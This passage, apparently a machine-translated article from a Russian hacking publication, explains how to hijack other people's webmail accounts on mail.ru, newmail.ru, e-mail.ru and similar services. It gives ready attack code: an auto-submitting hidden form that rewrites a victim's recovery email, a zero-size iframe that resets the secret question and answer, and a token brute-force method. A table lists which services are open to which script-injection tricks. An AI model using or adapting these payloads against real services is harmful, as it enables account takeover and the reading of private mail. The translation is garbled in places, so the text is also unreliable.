However, using the GET method, settings cannot now be changed in the mail.ru mailbox, therefore I will describe in detail the technical side of the issue.
I. We send a letter with a code to the desired mailbox, which will generate a frame directly in the body of the message with a link to our website. If possible, the script should be triggered without any user involvement (clicking, clicking, hovering, image loading, etc.):
II. On the resource http://yoursite.ru we have an HTML document with the form for sending the modified data to the mail.ru server.
The content of yourscript.html:
<form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br> <input type = "hidden" name = "page" value = "2"> <br> <input type = "hidden" name = "Email" value = "email@example.com"> <br> <input type = "hidden" value = "Save" name = "Save"> <br> </form> <br> <script> <br> document.anketa.submit (); <br> </script>Notes: I guarantee the work of the client part of the script unchanged only for IE; the sending form is posted on a separate site specifically to "offload" the letter.
We implement the script through the style tag.
Settings page address: http://mail01.mail.com/scripts/common/genprofile.cgi
Form Name: profileform
Secret text field name hint_a
WWW.NEWMAIL.RUIn my opinion, it’s a pretty popular mailer, so I’ll talk about it in detail. Moreover, taking possession of someone else's account on it is much easier than it seems at first glance. You can do this: send an email with a script that will receive a session id at startup, generate the necessary requests, and change the settings of the alternative email (which will then be sent to the password) and the secret question and answer. However, if you specify any other address during the reminder, the password will be sent to it, if only the secret answer was correct. And the following observation: session id for changing settings can generally NOT be used. Plus, any tags are allowed. All of the above reduces the amount of code to a couple of lines:
<iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </iframe>
The method of hacking e-mail.ru does not fit somewhat into the general subject of the article, but nevertheless - mail . When I needed to get the password from one box, as usual I registered an account and began to research the system. The first thing that caught my eye was the ability to set a new password and a secret question with the answer, without entering the old password. The usual action plan: check the filtering of tags, get the ID and execute the request. However, to change the settings, a special variable called utoken was used, which is contained in the body of the document. Having experimented with changing the question and answer with the previously known utoken:
I came to I conclude that ID and cookies are not required to change the settings. At the same time, after observing utoken, it was found that the four-digit hexadecimal number after the email address firstname.lastname@example.org lies in a very narrow range. Namely, in order to establish a secret question with an answer on any box that interests us, you need to sort through only 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . When the number is guessed, we will get into the right box.
Notes: some changes have occurred at the moment. Password recovery service does not work, so it’s advisable to change it right away. The setting change address has also changed:
The method does not always work. Probably, it is nevertheless required that the user occasionally logs in via the web .
Table with the characteristics of free WWW-servers
inbox.ru , bk.ru , list.ru ,
email.com , post.com , myself.com , consultant.com , etc.
nm.ru , hotmail.ru , orc.ru , nightmail.ru
|Any way||Read / change the question and answer. Password issued valid|
| www.netman.ru and www.mailgate.ru
the same mailer. about 80 domains
|www.yandex.ru||OnError, OnLoad||Removing the site * .narod.ru (JS is not required)|
|www.ukr.net|| embed src = javasc
ript: this .wav>
|Read the answer to the security question.|
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
pochta.ru , pisem.net , fromru.com , land.ru , etc.
|In many ways||Account deleting|